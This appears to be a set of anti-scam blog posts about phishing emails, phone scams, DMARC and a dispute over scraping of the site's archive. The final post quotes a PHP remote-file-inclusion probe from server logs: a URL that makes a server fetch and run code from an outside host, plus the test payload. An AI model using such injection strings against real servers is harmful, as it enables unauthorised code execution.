Phishing

Scamdex Data used in Research – if only they’d asked!

So a routine search turned up a little Research Paper from the University of Nebraska in Omaha.

Trends in Phishing Attacks: Suggestions for Future Research (2011) | Ryan M. Schuetzler | University of Nebraska at Omaha, rschuetzler@unomaha.edu

While I’m flattered by being used as a creditable source, I am upset that they:

  1. Used the Scamdex Email Archive without permission.
  2. Did not contact Scamdex to get permission.
  3. Used ‘Screen Scraping’ tools to (in their words)

    …To obtain a corpus of phishing emails, we scraped 2709 emails from Scamdex.com (“Email Scam, Internet Fraud, IdentityTheft & Phishing Resource,” n.d.). This corpus contained emails over a 3-year period from November 2006 to June 2009.These emails were submitted to Scamdex by recipients of phishing attacks..

  4. Did not credit Scamdex in their references.

The legality of screen-scraping, a term used for software tools that extensively mine or extract information or complete contents of a website, is debatable – Generally speaking, if commercial use is made of the result then it gets a bit tricky, but for research purposes a lot more latitude is generally given. The Electronic Frontier Foundation has a good one-pager on Fair Use.

If asked, Scamdex would have been completely happy to collaborate. We do ask (nicely) that …

“Any derived content from the Scamdex.com website must clearly show attribution to Scamdex.com as the source and must include a link to the original information”. –http://www.scamdex.com/About-Scamdex.php#use

Scamdex is happy to be used as a research tool, but in future – ask first, then make sure it is credited – is that too much to ask for?

Scam Of The Week: FTC Refund Phishing Phraud

Scam Of The Week: FTC Refund Phishing Phraud
Warn your employees, friends and family
Hi,

There is a new Scam Of The Week where bad guys are trying to trick people into clicking on phishing links to receive an FTC refund, with the twist that the refund is actually real.

The FTC first took action against J. K. Publications, Inc in 1998. These scammers purchased access to the credit card account numbers of more than three million Visa and MasterCard holders from a California bank with the pretext to confirm that the customers had valid credit cards and debit cards.

However, back at the ranch, they made illegal charges on the cards for X-rated Websites. Quite a few of the people who had been fraudulently charged didn’t even own a PC at that time!

The FTC was able to quickly shut down the scam, but J.K. Publications and the people involved in the scam managed to hide millions of the fraudulently obtained dollars in off-shore banks. It took the FTC a very long time to get the money back but they are at the moment mailing 322,000 checks to victims of this scam.

So, lazy bad guys just go to the FTC website to get ideas for phishing attacks and start sending them to millions of people. I suggest you send the following to your employees, friends and family:

There is a new Scam Of The Week where bad guys have taken an actual past scam that the Federal Trade Commission has resolved and is now refunding money on. Bad guys take these FTC cases and create a phishing attack out of them.

Here is the rule: If you receive any emails from an official-sounding organization that promises you a refund for any amount, be very careful and never click on any links or open any attachment you did not ask for. Delete the email. (OPTIONAL: or use the KnowBe4 Phish Alert Button)

https://info.knowbe4.com/free-phish-alert

CyberHeist News

Just how valuable is a Hacked PC?

The massively informative “Krebs on Security” Blog published this graphic which is a startling depiction of just how valuable a compromised PC can be to cyber criminals.

Often the owner of such a PC does not even know that this has happened, and there are millions that have. Check your own PC regularly for oddities and update your malware/virus/firewall softwarre to prevent your own machines becoming a tool of scammers.

From Krebs on Security blog, a graphic showing the value to hackers, scammers and cyber criminals of a compromised (Hacked) PC.

Big Internet (Facebook, Google) gets serious about Email Scams.

And this time, they seem to be serious, joining together these powerhouses:

* Big Internet: Google, Facebook, Microsoft, Yahoo, AOL, LinkedIn etc.

* Big Money (aka financial service providers): Bank of America, Fidelity Investments and PayPal.

* Big Security: Agari, Cloudmark, eCert, Return Path and the Trusted Domain Project

To fight Email Scams, specifically Phishing Scams. Such scams try to trick people into giving away passwords and other personal information by sending emails that look as if they come from a legitimate bank, retailer or other business. When Bank of America customers see emails that appear to come from the bank, they might click on a link that takes them to a fake site mimicking the real Bank of America’s. There, they might enter personal details, which scam artists can capture and use for fraud.

To combat that, 15 major technology and financial companies have formed an organisation to design a system for authenticating emails from legitimate senders and weeding out fakes. The new system is called DMARC – short for Domain-based Message Authentication, Reporting and Conformance. In a nutshell, it is another way (in addition to the SPF and DKIM checking already available) to make sure hat an email is really form the organization that it says it is.

Most Phishing emails pretend to come from a respected institution and it is a simple matter to claimthat the message came from the domain name of the trusted entity. This is the first step in establishing trust – if an email arrives that seems to come from ‘accounts@paypal.com’, one’s guard is just that little bit lower.

DMARC aims to prevent those emails from ever arriving by intelligent checking and has a feedback mechanism that alerts the real organization that the event has occured.

It’s not going to stop email from addresses that use obfuscated (accounts@paypal.com.asjdgh.gyutut.com) or maliciously mis-spelled (accounts@paypai.com) or just completely fake email addresses (accounts@paypalbillingsupport.com)
…but it’s a start and Scamdex for one applauds it!

More information [than anyone probably needs to know] is available at the DMARC website

Phishing Scam of the Day (PenFed)

We received an email today with the promise of a $50 credit to my Pentagon Federal Credit Union (PenFed) account if I completed a customer service survey. The “survey” was sent as an attached HTML (web page) file, which, when completed went to the homepage of PenFed.

Apart from the simple questions, the final part of the form asked for the online account usrname and password and also the PIN number for the bank. If anyone did fill in this form, they will have handed over the keys to their bank account and should expect it to empty pretty quickly.

This is a common enough scam, but stands out for the clever use of bait ($50) and the simple but plausible task required to receive the bait. Enough to blind the recipient to the dangers.

What actually happens when you click ‘Continue’ in the form is that the detalils you entered are sent to a Texas-based Comcast computer –
IP Address 98.195.57.33 (Information on this IP from DomainWhitePages Information) and then immediately redirected to the PenFed website where the user will feel comforted by the secure website url (https://www.penfed.org/)

The only real mistake this scam makes is to use untargetted spam to deliver the message. Non-PenFed members are unlikely to click through and the chances are that websites such as Scamdex.com will pick it up and close the operation down. As of this post, the server is still up and running………

Facebook Phishing Attempts and How To Spot Them

Facebook users often use the email notification service to inform them of events on the site, whether it’s a new friend request, a reply to a comment or a photo tag. The notifications always have a handy button to get to the exact point in the site of interest. The problem is trying to work out whether to trust the links.

FaceBook doesn’t exactly help it’s users to feel comfortable – it uses long complex strings in it’s URLs, odd domain names and a range of different email formats and senders. If it just sent a link to the item (eg. http://facebook.com?id=987112) then we could be sure we’re not going to suddenly become friends with a scammer or perform some other action.

Ed Bott over at ZDNet has compiled a set of real and fake Facebook notifications and invites you to try to see which is which. The fact that this is so difficult is a perfect illustration of the problem.
The simple answer is to never click on links purporting to come from Facebook unless they have some obviously personalized information that you recognize (and perhaps not even then). Scam/Spammers don’t often have the time or skills to hand-craft each email so they will be very generic.

Best practice to avoid phishing attempts is to NEVER click on any links received by email. Always type in the URL yourself or use a bookmark then you won’t get any nasty shocks!

Read Ed Bott’s article in full Here

Another good tip is to keep your computer updated with the top cloud security software to make sure that your data does not get phished or other computer data attacks occur. It is less likely to have that happen if you have a good security program installed.

Golden 1 Phone Scam hits Sacramento

Social engineering is an approach used to gain unauthorized access to or acquisition of information assets. This approach relies on misrepresentation and the trusting nature of individuals, and is often carried out through the use of phishing telephone calls or email.
A phishing telephone call or phishing email may sound or look as though it comes from an organization you do business with, such as a bank or government entity, but they are generally from a scammer trying to obtain your personal information under false pretenses.

This particular scam is being carried out by telephone as follows:

An individual leaves a message on an employee’s work phone number, stating they are with the Golden 1 Credit Union. In this scam, the message states that the targeted person’s credit and/or debit card has been temporarily suspended and instructs them to push “1” to reach security. Do not push “1”. If you push “1”, a second recording will ask you put your card number. DO NOT PUT IN YOUR CARD NUMBER!!!!

The following are general practices to avoid becoming a victim of these types of scams:

• Do not respond to unsolicited (spam) e-mail. Simply delete it.
• Be skeptical of individuals representing themselves as officials soliciting personal information via e-mail, telephone or other means.
• Do not click on links contained within an unsolicited e-mail.
• Be cautious of e-mail claiming to contain pictures in attached files, as the files may contain viruses. Only open attachments from known senders.
• Validate the legitimacy of the organization by directly accessing the organization’s website rather than following an alleged link to the site.
• Do not provide personal or financial information to anyone who solicits information.

The Golden 1 Credit Union has been made aware of this scam. Additional information from Golden 1 Credit Union regarding fraud is available on their website at: https://www.golden1.com/privacysecurity/phonefraud.aspx

PHP Exploit URL foxes Apache

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

My banana was once part of a bunch very similar to this one

Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts  is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly  ‘go away page‘ :).

In this case, the URL carries a payload that is itself a  link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’  on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?

Analyzing the url gets me to this reduction of required parts:

* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?